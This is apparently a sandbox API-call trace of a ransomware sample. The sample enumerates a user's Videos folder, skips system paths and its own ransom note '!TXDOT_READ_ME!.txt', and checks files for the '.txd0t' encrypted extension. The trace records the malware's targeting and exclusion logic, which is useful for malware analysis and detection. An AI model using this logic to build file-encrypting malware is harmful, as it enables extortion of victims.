lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0f2440, ftCreationTime.dwHighDateTime=0x1d5e778, ftLastAccessTime.dwLowDateTime=0x52ab196d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52ab196d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="E10w7BI-yN9p", cAlternateFileName="E10W7B~1")) returned 1 [0090.311] StrCmpW (psz1="E10w7BI-yN9p", psz2=".") returned 1 [0090.312] StrCmpW (psz1="E10w7BI-yN9p", psz2="..") returned 1 [0090.312] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0090.312] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0090.312] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="E10w7BI-yN9p", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p" [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\windows\\system32\\") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\windows\\system\\") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\appdata\\local\\") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\boot\\") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\perflogs\\") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\programdata\\") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\drivers\\") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\wsus\\") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="crypt_detect") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="cryptolocker") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="ransomware") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="C:\\WINDOWS") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.312] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="C:\\Program Files") returned 0x0 [0090.313] GetProcessHeap () returned 0xe30000 [0090.313] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c8) returned 0xec7a58 [0090.313] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p" [0090.313] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", psz2="\\*", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\*") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\*" [0090.313] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0f2440, ftCreationTime.dwHighDateTime=0x1d5e778, ftLastAccessTime.dwLowDateTime=0x52ab196d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52ab196d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec26f0 [0090.313] StrCmpW (psz1=".", psz2=".") returned 0 [0090.313] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0f2440, ftCreationTime.dwHighDateTime=0x1d5e778, ftLastAccessTime.dwLowDateTime=0x52ab196d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52ab196d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.313] StrCmpW (psz1="..", psz2=".") returned 1 [0090.313] StrCmpW (psz1="..", psz2="..") returned 0 [0090.313] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a8b6c2, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x52a8b6c2, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52ab196d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.313] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.313] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.313] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p" [0090.313] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", psz2="\\", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\" [0090.313] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\!TXDOT_READ_ME!.txt" [0090.313] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.313] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.314] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68cd7160, ftCreationTime.dwHighDateTime=0x1d5ed3d, ftLastAccessTime.dwLowDateTime=0x3b1202a0, ftLastAccessTime.dwHighDateTime=0x1d5ea35, ftLastWriteTime.dwLowDateTime=0x52a8b6c2, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x853f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="cDQNx.mp4.txd0t", cAlternateFileName="CDQNXM~1.TXD")) returned 1 [0090.314] StrCmpW (psz1="cDQNx.mp4.txd0t", psz2=".") returned 1 [0090.314] StrCmpW (psz1="cDQNx.mp4.txd0t", psz2="..") returned 1 [0090.314] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p" [0090.314] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", psz2="\\", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\" [0090.314] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\", psz2="cDQNx.mp4.txd0t", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4.txd0t" [0090.314] PathFindExtensionW (pszPath="cDQNx.mp4.txd0t") returned=".txd0t" [0090.314] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.314] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ac050, ftCreationTime.dwHighDateTime=0x1d5e818, ftLastAccessTime.dwLowDateTime=0x52dacb88, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52dacb88, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="YD6Z6S-cuGg", cAlternateFileName="YD6Z6S~1")) returned 1 [0090.314] StrCmpW (psz1="YD6Z6S-cuGg", psz2=".") returned 1 [0090.314] StrCmpW (psz1="YD6Z6S-cuGg", psz2="..") returned 1 [0090.314] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p" [0090.314] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", psz2="\\", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\" [0090.314] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\", psz2="YD6Z6S-cuGg", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0090.314] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\windows\\system32\\") returned 0x0 [0090.314] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.314] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\windows\\system\\") returned 0x0 [0090.314] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.314] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.314] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\appdata\\local\\") returned 0x0 [0090.314] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.314] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.314] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.314] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\boot\\") returned 0x0 [0090.314] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\perflogs\\") returned 0x0 [0090.314] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\programdata\\") returned 0x0 [0090.314] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\drivers\\") returned 0x0 [0090.314] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\wsus\\") returned 0x0 [0090.314] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.314] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.314] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="crypt_detect") returned 0x0 [0090.315] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="cryptolocker") returned 0x0 [0090.315] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="ransomware") returned 0x0 [0090.315] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="C:\\WINDOWS") returned 0x0 [0090.315] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.315] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="C:\\Program Files") returned 0x0 [0090.315] GetProcessHeap () returned 0xe30000 [0090.315] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4e0) returned 0xec7f28 [0090.315] StrCpyNW (in: psz1=0xec7f28, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0090.315] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\*", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\*") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\*" [0090.315] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\*", lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ac050, ftCreationTime.dwHighDateTime=0x1d5e818, ftLastAccessTime.dwLowDateTime=0x52dacb88, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52dacb88, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2330 [0090.315] StrCmpW (psz1=".", psz2=".") returned 0 [0090.315] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ac050, ftCreationTime.dwHighDateTime=0x1d5e818, ftLastAccessTime.dwLowDateTime=0x52dacb88, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52dacb88, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.315] StrCmpW (psz1="..", psz2=".") returned 1 [0090.315] StrCmpW (psz1="..", psz2="..") returned 0 [0090.315] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52ad7ba6, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x52ad7ba6, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52ad7ba6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.315] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.315] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.315] StrCpyNW (in: psz1=0xec7f28, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0090.315] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\" [0090.315] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\!TXDOT_READ_ME!.txt" [0090.315] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.315] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.315] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.315] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.315] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.315] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.315] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.315] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.315] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.315] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.316] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1444bf50, ftCreationTime.dwHighDateTime=0x1d5eec7, ftLastAccessTime.dwLowDateTime=0x93065290, ftLastAccessTime.dwHighDateTime=0x1d5ec33, ftLastWriteTime.dwLowDateTime=0x52ab196d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x32d4, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="6HAlI.avi.txd0t", cAlternateFileName="6HALIA~1.TXD")) returned 1 [0090.316] StrCmpW (psz1="6HAlI.avi.txd0t", psz2=".") returned 1 [0090.316] StrCmpW (psz1="6HAlI.avi.txd0t", psz2="..") returned 1 [0090.316] StrCpyNW (in: psz1=0xec7f28, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0090.316] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\" [0090.316] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\", psz2="6HAlI.avi.txd0t", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi.txd0t" [0090.316] PathFindExtensionW (pszPath="6HAlI.avi.txd0t") returned=".txd0t" [0090.316] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.316] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd78b7cd0, ftCreationTime.dwHighDateTime=0x1d5e7fe, ftLastAccessTime.dwLowDateTime=0xa87fd220, ftLastAccessTime.dwHighDateTime=0x1d5e40b, ftLastWriteTime.dwLowDateTime=0x52ad7ba6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18789, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="8aR-oZ.mp4.txd0t", cAlternateFileName="8AR-OZ~1.TXD")) returned 1 [0090.316] StrCmpW (psz1="8aR-oZ.mp4.txd0t", psz2=".") returned 1 [0090.316] StrCmpW (psz1="8aR-oZ.mp4.txd0t", psz2="..") returned 1 [0090.316] StrCpyNW (in: psz1=0xec7f28, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0090.316] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\" [0090.316] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\", psz2="8aR-oZ.mp4.txd0t", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4.txd0t" [0090.316] PathFindExtensionW (pszPath="8aR-oZ.mp4.txd0t") returned=".txd0t" [0090.316] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.316] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cf16450, ftCreationTime.dwHighDateTime=0x1d5ebab, ftLastAccessTime.dwLowDateTime=0x8698a780, ftLastAccessTime.dwHighDateTime=0x1d5e18c, ftLastWriteTime.dwLowDateTime=0x52afeefb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x5335, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="hrFHHxEDNXCX.swf.txd0t", cAlternateFileName="HRFHHX~1.TXD")) returned 1 [0090.316] StrCmpW (psz1="hrFHHxEDNXCX.swf.txd0t", psz2=".") returned 1 [0090.316] StrCmpW (psz1="hrFHHxEDNXCX.swf.txd0t", psz2="..") returned 1 [0090.316] StrCpyNW (in: psz1=0xec7f28, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: 